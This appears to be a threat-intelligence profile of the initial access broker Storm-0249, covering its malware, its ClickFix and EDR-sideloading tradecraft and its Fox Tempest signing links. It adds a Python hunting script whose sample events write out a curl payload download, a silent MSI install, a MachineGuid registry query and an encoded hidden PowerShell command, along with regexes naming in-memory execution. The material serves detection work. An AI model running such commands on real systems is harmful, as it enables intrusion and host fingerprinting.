Storm-0249
Storm-0249 is a financially motivated cybercriminal threat actor tracked by Microsoft as an initial access broker active since 2021. The group brokers network access to ransomware operators and supports ransomware attacks. Microsoft states that Storm-0249 is known for distributing BazaLoader, IcedID, Bumblebee, Emotet, Latrodectus and, in some campaigns, Brute Ratel C4 as part of its delivery chains.

Historically, Storm-0249 relied on large-scale phishing and email-based delivery, including tax-themed phishing campaigns and campaigns delivering Latrodectus or other initial access malware. Microsoft has also linked Storm-0249 to the ClickFix methodology and reported that, beginning in March 2025, the actor shifted from email-based delivery to compromising legitimate websites, potentially through WordPress vulnerabilities, and using ClickFix to deliver payloads. Multiple sources describe Storm-0249 as evolving from a noisy mass-phishing actor into a stealthier, more targeted initial access broker.

Reporting states that Storm-0249 abuses trusted endpoint detection and response (EDR) components and built-in Windows utilities to load malware stealthily, maintain persistence, and prepare victim environments for ransomware attacks. Reported tradecraft includes DLL sideloading using legitimate SentinelOne components, abuse of EDR processes, use of curl.exe and fileless PowerShell execution, and use of legitimate Windows utilities such as reg.exe and findstr.exe. ReliaQuest reported that Storm-0249 used ClickFix social engineering to convince victims to execute malicious commands via the Windows Run dialog, then deployed malicious MSI packages with SYSTEM privileges, dropped a trojanized DLL alongside a legitimate SentinelOne executable, established command-and-control, conducted reconnaissance, and extracted machine identifiers such as MachineGuid.
Storm-0249 has also used malvertising and large-scale phishing and has been associated with ClickFix campaigns alongside Storm-1607, Storm-0426, and Storm-1877. Microsoft linked Storm-0249 to Fox Tempest, a malware-signing-as-a-service operation that abused Microsoft Artifact Signing. According to that reporting, Storm-0249 was one of the threat actors that used Fox Tempest-signed malware in active intrusions and real-world attacks, including delivery through malvertising, SEO poisoning, and fake ads. Storm-0249 is also listed among Fox Tempest customers alongside Vanilla Tempest, Storm-0501, and Storm-2561. No additional aliases or sub-groups are documented for Storm-0249 beyond the name itself.
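The behaviours attributed to Storm-0249 above (commands launched from the Run dialog, curl.exe downloads, silent MSI installs, fileless PowerShell, reg.exe queries for MachineGuid) can be turned into process-creation hunting heuristics. The following Python is an added example, not code from the page or its sources; it assumes simplified events with image, parent and cmdline fields, treats explorer.exe as the parent of Run-dialog commands, and runs over constructed sample events rather than real telemetry.

```python
import re

# Constructed process-creation events for illustration only (not real telemetry).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\curl.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"curl.exe -s -o C:\Users\Public\upd.msi http://example.invalid/upd.msi"},
    {"image": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"msiexec.exe /i C:\Users\Public\upd.msi /qn"},
    {"image": r"C:\Windows\System32\reg.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'reg query "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell -nop -w hidden -enc SQBFAFgA"},
    {"image": r"C:\Windows\System32\reg.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"reg query HKCU\Software\Classes"},  # benign reg use: no hit expected
]

def _image_is(event, name):
    return event["image"].lower().endswith("\\" + name)

# Each heuristic maps to a behaviour the reporting attributes to Storm-0249.
RULES = {
    # ClickFix: a command pasted into the Run dialog is spawned by explorer.exe,
    # and curl.exe fetching a remote URL from that parent is rare in normal use.
    "run_dialog_curl_download": lambda e: _image_is(e, "curl.exe")
        and e["parent"].lower().endswith("\\explorer.exe")
        and re.search(r"https?://", e["cmdline"], re.I) is not None,
    # Silent MSI install of a package staged in a user-writable location.
    "silent_msi_install": lambda e: _image_is(e, "msiexec.exe")
        and re.search(r"\s/(?:q|qn|qb|quiet)\b", e["cmdline"], re.I) is not None
        and re.search(r"\\Users\\|\\Temp\\|\\ProgramData\\", e["cmdline"], re.I) is not None,
    # Host fingerprinting: reg.exe reading the Cryptography\MachineGuid value.
    "machineguid_recon": lambda e: _image_is(e, "reg.exe")
        and "machineguid" in e["cmdline"].lower(),
    # Fileless PowerShell: encoded command or in-memory download/execute.
    "fileless_powershell": lambda e: _image_is(e, "powershell.exe")
        and re.search(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b|downloadstring|\biex\b",
                      e["cmdline"], re.I) is not None,
}

def match_event(event):
    """Return the names of all rules that fire on one event."""
    return [name for name, rule in RULES.items() if rule(event)]

def hunt(events):
    """Map event index -> fired rule names, keeping only events that fired something."""
    fired = {i: match_event(ev) for i, ev in enumerate(events)}
    return {i: names for i, names in fired.items() if names}
```

Each rule alone is noisy in a large estate; the value is in seeing several fire on one host within a short window, which mirrors the ClickFix-to-MSI-to-recon chain the reporting describes.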
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- Health Care Equipment & Services
Where they target
Geographies tied to known operations.
- 🇺🇸 United States
Tradecraft
17 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
12 malware families attributed to this actor across reporting.
Observables
15 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
20 sources tracked across advisories, community write-ups, and news.
Named by Microsoft as a threat group that utilized malware signed through Fox Tempest's fraudulent signing service.
Named as a customer of Fox Tempest's malware-signing service.
Named as a threat actor linked to the Fox Tempest malware-signing service.
Named activity cluster observed using Fox Tempest-signed malware in real-world intrusions.